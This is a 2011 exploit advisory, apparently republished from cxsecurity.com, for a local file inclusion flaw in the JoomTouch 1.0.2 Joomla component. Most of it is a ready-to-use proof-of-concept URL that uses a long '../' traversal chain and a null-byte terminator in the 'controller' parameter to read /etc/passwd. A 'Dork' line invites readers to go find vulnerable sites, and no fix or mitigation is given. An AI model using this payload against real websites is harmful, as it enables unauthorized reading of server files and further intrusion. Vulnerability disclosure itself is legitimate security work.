Joomla JoomTouch 1.0.2 Local File Inclusion

Published
Credit
Risk
2011.08.18
NoGe
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

================================================================================

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability

Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/

================================================================================

[o] Exploit

http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]


[o] PoC

http://localhost/[path]/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00


[o] Dork

be creative.. :))

================================================================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe matthews wishnusakti kaka11 inc0mp13te martfella
pizzyroot Genex H312Y }^-^{ noname tukulesto

================================================================================

[o] August 17 2011 - Papua, Indonesia
[o] Hiduplah Indonesia Raya.. MERDEKA!! ^_____^


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com